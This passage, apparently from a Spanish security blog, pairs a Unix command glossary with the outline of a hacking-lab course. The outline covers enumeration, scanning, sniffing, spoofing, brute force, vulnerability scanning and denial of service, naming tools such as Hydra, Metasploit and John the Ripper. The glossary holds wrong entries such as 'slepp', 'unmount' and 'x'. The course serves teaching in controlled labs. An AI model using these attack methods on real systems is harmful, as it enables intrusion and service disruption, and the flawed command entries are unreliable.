Muestra el nombre NIS (Network Information System) o YP (Yellow Pages) del sistema
du
Estima el espacio utilizado por un fichero
echo
Muestra una línea de texto
env
Ejecuta un programa en un entorno modificado
false
Sale con un código de estado que indica fallo
fdisk
Manipula la tabla de particiones de los discos
fg
Mueve a primer plano procesos ejecutándose en segundo plano
file
Determina el tipo de fichero
find
Busca ficheros por la jerarquía de directorios
free
Muestra la cantidad de memoria utilizada y libre del sistema
ftp
Cliente FTP
fuser
Identifica los procesos que están utilizando ciertos ficheros o sockets
gcc
Compilador GNU de C y C++
grep
Muestra las líneas que cumplen un cierto patrón
groupadd
Crea un grupo nuevo
groupdel
Elimina un grupo
groupmod
Modifica un grupo
groups
Muestra todos los grupos a los que pertenecen un usuario
gunzip
Descomprime ficheros comprimidos con el algortimo Lempel Ziv
gzip
Comprime ficheros con el algoritmo Lempel Ziv
host
Utilidad de búsqueda DNS (Domain Name System)
hostname
Muestra o establece el nombre del sistema
id
Muestra los ID efectivo y real de usuario y de grupo
ifconfig
Configura una interfaz de red
kill
Termina un proceso
ksh
Shell Korn
last
Muestra una lista con los últimos usuarios conectados al sistema
lastlog
Muestra la última hora de conexión de una cuenta
ln
Crea enlaces entre ficheros
ls
Muestra el contenido de los directorios
mail
Envía y recibe mensajes de correo
man
Formatea y muestra las páginas de manual
mesg
Controla el acceso de escritura en un terminal
mkdir
Crea directorios
more
Muestra el contenido de ficheros pantalla a pantalla
mount
Monta sistemas de ficheros
mv
Mueve o renombra ficheros y directorios
netstat
Muestra conexiones de red, tablas de rutas, estadísticas de las interfaces, conexiones ocultas y pertenencia a redes multicast
nice
Ejecuta un programa modificando los atributos de prioridad
nslookup
Lanza consultas a los servidores de nombres
passwd
Cambia los atributos de conexión y las contraseñas
ping
Envía paquetes ECHO_REQUEST ICMP
ps
Muestra información sobre los procesos en ejecución
pwd
Muestra el nombre del directorio actual
quota
Muestra el uso de disco y los límites establecidos
quotaoff
Desactiva las cuotas del sistemas de ficheros
quotaon
Activa las cuotas del sistema de ficheros
repquota
Ofrece Ofrece un resumen de las cuotas definidas
rm
Elimina ficheros o directorios
rmdir
Elimina directorios vacios
route
Muestra o manipula la tabla de rutas del sistema
rpcinfo
Muestra información sobre RPC (Remote Procedure Calls)
sed
Editor Stream
setquota
Establece coutas de disco
showmount
Muestra información de los directorios montados en un servidor NFS (Network File System)
shutdown
Ejecuta una parada del sistema
slepp
Deteniene el proceso la cantidad de tiempo especificada
sort
Ordena líneas en ficheros de texto
strace
Traza las llamadas al sistema y las señales
strings
Muestra los caracteres imprimibles de un fichero
tar
Utilidad de empaquetamiento
tcsh
Shell C con edición de comandos
telnet
Cliente Telnet
tftp
Cliente TFTP (Trivial File Transfer Protocol)
traceroute
Muestra la ruta que siguen los paquetes para llegar a un determinado sistema
true
Sale con un código de estado que indica éxito
unmount
Desmonta un sistema de ficheros
uname
Muestra información sobre el sistema
useradd
Crea un nuevo usuario
userdel
Borra una cuenta de usuario
uptime
Muestra la cantidad de tiempo que el sistema lleva encendido
vi
Editor de texto
x
Muestra los usuarios que están conectados al sistema y lo que están haciendo
wall
Envía mensajes a todos los usuarios
wc
Muestra el número de bytes, palabra y líneas de un fichero
whereis
Localiza el fichero ejecutable, el código fuente y las páginas de manual de un determinado programa
which
Muestra la ruta completa de un fichero
who
Muestra los usuarios que están conectados al sistema
whoami
Muestra el ID efectivo del usuario
write
Envía mensajes a otro usuario
ypdomainname
Muestra o establece el nombre NIS (Network Information System) o YP (Yellow Pages) del sistema

Enlaces de interés con otros comandos (I, II, III, IV, V, VI, VII)

Algunas notas aclaratorias:

Los términos utilizados en los laboratorios referentes a “hacking”, “hacker”, etc, son bajo la definición de especialistas en seguridad y sistemas informáticos. Muy diferente a la definición que dan algunos medios de información, relacionandolos con delincuentes. Para mí (apreciación personal), las personas que se dedican a causar estragos, robos, y demás actos, reciben la denominación de delincuentes informáticos; (personas que realizan actos delictivos mediante la utilización de herramientas informáticas).

El contenido temático de los laboratorios estará dirigido para usuarios con un nivel de conocimientos del tema comprendido entre básico y medio. El material expuesto no está enfocado para usuarios de amplia experiencia en el tema, por el contrario pretende acercar a los entusiastas de aprender y que aún no encuentran la manera de comenzar de un modo más práctico. Pretende refrescar un poco los conocimientos de usuarios avanzados, y pretende invitar a los mismos a desarrollar sus propios laboratorios para el conocimiento de toda la comunidad investigadora.
Los laboratorios pretenden ser lo más práctico posible, obviamente citando las fuentes de profundización para obtener más información sobre los temas tratados.
Casi la totalidad de los laboratorios serán llevados a cabo bajo entornos controlados de instrusión, utilizando máquinas virtuales, con diferentes sistemas operativos, entre ellos “BackTrack”, “OpenSuSe Linux”, “Windows Server 2003 Edición Enterprise”, “NetBSD”, entre otros.

Contenido:

• Introducción y descripción de los laboratorios.

Instalación y configuración del ambiente virtual controlado de los laboratorios. (Instalación de VMware WorkStation – Instalación de la distribución BackTrack – Instalación de Windows 2003 Server Enterprise Edition – Instalación de las VMware Tools)

• Identificación de Banner’s (banderas)

Descripción y definición de la identificación de banner’s (utilización de las herramientas y procedimientos: telnet, netcat, Scanline, Xprobe2, AMAP y banner.c, para la identificación de banner’s.)

• Enumeración del objetivo

Descripción y definición del target enumeration (utilización de las herramientas y procedimientos: nullsesion, getmac, user2sid, sid2user, userdump, userinfo, dumpsec, comandos net, ping’s, pathping’s, nmap, nmapfe, nslookup, nmblookup, rpcinfo, visual route, sam spade, netcraft, sprint y winfingerprint, para la enumeración del objetivo).

• Escaneo

Descripción y definición del scanning (utilización de las herramientas y procedimientos: Angry IP, LANguard, Fscan, Passifist, Lanspy, Netcat, Superscan, Strobe, FTPScanner, TCS CGI Scanner, Hydra, WGateScan/ADM Gates, para las diferentes técnicas de escaneo) .

• Sniffing

Descripción y definición del sniffing (utilización de las herramientas y procedimientos: Ethereal-Wireshark, Ngrep, TcpDump, WinDump, IPDump2, ZxSniffer y Sniffit, para las diferentes ténicas del sniffing)

• Spoofing

Descripción y definición del spoofing (utilización de las herramientas y procedimientos: RafaleX, SMAC y Packit, para las diferentes técnicas del spoofing).

• Ataques de fuerza bruta

Descripción y definición del brute force (utilización de las herramientas y procedimientos: NETWOX/NETWAG, FGDump, LC, Cain, CHNTPW, John the ripper, BruteFTP y TSGrinder II, para las diferentes técnias de brute force).

• Escaneo de vulnerabilidades

Descripción y definición del Vulnerability Scanning (utilización de las herramientas y procedimientos: SAINT, NETWOX/NETWAG, Solar Winds, Retina, X-scan, SARA, N-Stealth, Pluto, Metasploit, Nikto, SSS, Cerberus, AutoScan, Nessus y Core Impact, para las diferentes técnicas del vulnerability scanning).

• Redireccionamiento

Descripción y definición de la redirección (utilización de las herramientas y procedimientos: PortMapper, EliteWrap, Fpipe, PsExec y NETWOX/NETWAG, para las diferentes técnicas de la redirección) .

• Denegación del Servicio (DoS)

Descripción y definición de la Denegación del Servicio (utilización de las herramientas y procedimientos: Land Attack, Smurf Attack, SYN Attack, UDP Flood y Trash 2.c, para las diferentes técnicas de Denegación del Servicio).